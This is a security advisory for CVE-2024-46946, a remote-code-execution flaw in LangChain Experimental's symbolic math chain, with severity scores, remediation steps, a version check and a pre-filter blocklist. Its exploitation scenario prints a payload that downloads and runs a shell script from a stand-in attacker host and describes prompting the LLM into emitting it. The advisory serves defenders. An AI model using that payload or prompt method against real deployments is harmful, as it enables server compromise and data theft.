CVE-2024-46946: LangChain-Experimental: RCE via eval in math chain

CRITICAL · PoC AVAILABLE · CISA SSVC: ATTEND
Published September 19, 2024
CISO Take

Any application using LangChain Experimental's LLMSymbolicMathChain is exposed to unauthenticated remote code execution — CVSS 9.8. A public exploit exists. Patch immediately to a version above 0.3.0 or disable this chain; there is no safe workaround if the chain is exposed to untrusted input.

Risk Assessment

Severity is maximum: network-accessible, no authentication, no user interaction, public PoC available on GitHub. The vulnerability is trivial to exploit — sympy.sympify() internally calls eval() on user-influenced strings, meaning any attacker who can reach the endpoint can run arbitrary OS commands with the process's privileges. Exposure is broad because LangChain Experimental is widely adopted in AI agent prototypes and internal tools, many of which lack perimeter controls.
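The unsafe pattern can be illustrated without sympy itself: any parser that falls back to eval() on a user-controlled string becomes a code-execution primitive. A minimal sketch with a benign payload (in a real attack the string would spawn a shell, as in the scenario below):

```python
# DANGER: illustrative only. Mirrors the unsafe pattern in which a
# "math expression" string reaches Python's eval().
import os

def naive_parse(expr: str):
    # Stand-in for a parser that ultimately calls eval() on user input,
    # as sympy.sympify() did for the affected langchain-experimental versions.
    return eval(expr)

# A benign payload proving arbitrary code execution: instead of math,
# the "expression" imports os and calls a function.
payload = '__import__("os").getcwd()'
print(naive_parse(payload) == os.getcwd())  # True: attacker code ran
```

The same call site happily evaluates `"2 + 2"` and the payload alike, which is why no input that can be influenced by an LLM or end user should ever reach such a parser.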

Affected Systems

Package: langchain-experimental
Ecosystem: pip
Vulnerable Range: 0.1.17 through 0.3.0
Patched In: versions above 0.3.0

Do you use langchain-experimental 0.1.17 through 0.3.0 with LLMSymbolicMathChain? You're affected.

Severity & Risk

CVSS 3.1: 9.8 / 10 (CRITICAL)
EPSS: 0.7% chance of exploitation within 30 days (higher than 71% of all CVEs)
Exploitation Status: Exploit Available
Exploitation Likelihood: Medium
Sophistication: Trivial
Exploitation Confidence: Medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve).
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV (Attack Vector): Network
AC (Attack Complexity): Low
PR (Privileges Required): None
UI (User Interaction): None
S (Scope): Unchanged
C (Confidentiality): High
I (Integrity): High
A (Availability): High

Recommended Action

6 steps
  1. PATCH

    Upgrade langchain-experimental to a version above 0.3.0 immediately.

  2. AUDIT

    Inventory all applications importing LLMSymbolicMathChain; grep the codebase for 'LLMSymbolicMathChain' and 'langchain_experimental'.

  3. DISABLE

    If upgrade is not immediately possible, remove or disable LLMSymbolicMathChain from all agent configurations.

  4. ISOLATE

    Run LangChain services in sandboxed environments (containers with dropped Linux capabilities and no outbound internet access).

  5. DETECT

    Alert on unexpected subprocess spawns, outbound connections, or filesystem writes from LangChain service processes.

  6. VERIFY

    Confirm remediation by checking installed package version: pip show langchain-experimental.
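Step 6 can be scripted; a minimal sketch (the affected range 0.1.17 through 0.3.0 is taken from this advisory; pre-release or post-release version suffixes would need extra handling):

```python
from importlib.metadata import PackageNotFoundError, version

def is_vulnerable(ver: str) -> bool:
    """Return True if a langchain-experimental version string falls in
    the affected range 0.1.17 through 0.3.0 (inclusive)."""
    parts = tuple(int(p) for p in ver.split(".")[:3])
    return (0, 1, 17) <= parts <= (0, 3, 0)

def check_installed() -> str:
    # Query the local environment for the installed package version.
    try:
        ver = version("langchain-experimental")
    except PackageNotFoundError:
        return "langchain-experimental: not installed"
    status = "VULNERABLE - upgrade now" if is_vulnerable(ver) else "ok"
    return f"langchain-experimental {ver}: {status}"

print(check_installed())
```

Run this inside each virtual environment or container image, since a host-level check can miss per-application installs.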

CISA SSVC Assessment

Decision: Attend
Exploitation: PoC
Automatable: Yes
Technical Impact: Total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 9 - Risk Management System
ISO 42001
9.1 - Monitoring, Measurement, Analysis and Evaluation
NIST AI RMF
MS-2.5 - Testing, Evaluation, Validation and Verification
OWASP LLM Top 10
LLM02 - Insecure Output Handling

Frequently Asked Questions

What is CVE-2024-46946?

Any application using LangChain Experimental's LLMSymbolicMathChain is exposed to unauthenticated remote code execution — CVSS 9.8. A public exploit exists. Patch immediately to a version above 0.3.0 or disable this chain; there is no safe workaround if the chain is exposed to untrusted input.

Is CVE-2024-46946 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-46946, increasing the risk of exploitation.

How to fix CVE-2024-46946?

1. PATCH: Upgrade langchain-experimental to a version above 0.3.0 immediately.
2. AUDIT: Inventory all applications importing LLMSymbolicMathChain; grep the codebase for 'LLMSymbolicMathChain' and 'langchain_experimental'.
3. DISABLE: If an upgrade is not immediately possible, remove or disable LLMSymbolicMathChain from all agent configurations.
4. ISOLATE: Run LangChain services in sandboxed environments (containers with dropped Linux capabilities and no outbound internet access).
5. DETECT: Alert on unexpected subprocess spawns, outbound connections, or filesystem writes from LangChain service processes.
6. VERIFY: Confirm remediation by checking the installed package version: pip show langchain-experimental.

What systems are affected by CVE-2024-46946?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LangChain pipelines, math reasoning chains, LLM-powered API backends, internal AI tooling.

What is the CVSS score for CVE-2024-46946?

CVE-2024-46946 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 0.66%.

Technical Details

NVD Description

langchain_experimental (aka LangChain Experimental) 0.1.17 through 0.3.0 for LangChain allows attackers to execute arbitrary code through sympy.sympify (which uses eval) in LLMSymbolicMathChain. LLMSymbolicMathChain was introduced in fcccde406dd9e9b05fc9babcbeb9ff527b0ec0c6 (2023-10-05).

Exploitation Scenario

An attacker targets a public-facing AI chatbot or internal math-reasoning API built with LangChain. They craft a prompt that causes the LLM to output a valid-looking but malicious sympy expression such as '__import__("os").system("curl attacker.com/shell.sh|sh")'. LLMSymbolicMathChain passes this string to sympy.sympify(), which internally calls eval(), executing the payload with the server process's privileges. No credentials or special knowledge required — the public PoC confirms this is script-kiddie territory. A successful exploit yields full server compromise, data exfiltration, or lateral movement into the AI infrastructure.
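Until the chain can be removed or the package upgraded, a defensive pre-filter can reject anything that is not plainly arithmetic before it reaches any expression parser. A rough sketch (the allowlist and blocklist here are illustrative assumptions, not a substitute for patching, since allowlists of this kind are notoriously easy to get wrong):

```python
import re

# Allow only digits, whitespace, basic operators, parentheses, commas,
# and lowercase identifiers (for functions like sin or cos). Quotes,
# brackets, and attribute-access chains never match.
_SAFE_EXPR = re.compile(r"[0-9a-z\s+\-*/^().,]+")
# Belt-and-suspenders: reject known-dangerous substrings even if they
# slip past the character allowlist.
_BLOCKLIST = ("__", "import", "eval", "exec", "open", "system")

def looks_like_math(expr: str) -> bool:
    lowered = expr.strip().lower()
    if not _SAFE_EXPR.fullmatch(lowered):
        return False
    return not any(bad in lowered for bad in _BLOCKLIST)

print(looks_like_math("2*(3 + sin(1))"))                 # True
print(looks_like_math('__import__("os").system("id")'))  # False
```

Note that the filter must run on the string the LLM emits, not on the original user prompt, because the model itself can be coaxed into producing the payload.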


CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Timeline

Published
September 19, 2024
Last Modified
July 16, 2025
First Seen
September 19, 2024

Related Vulnerabilities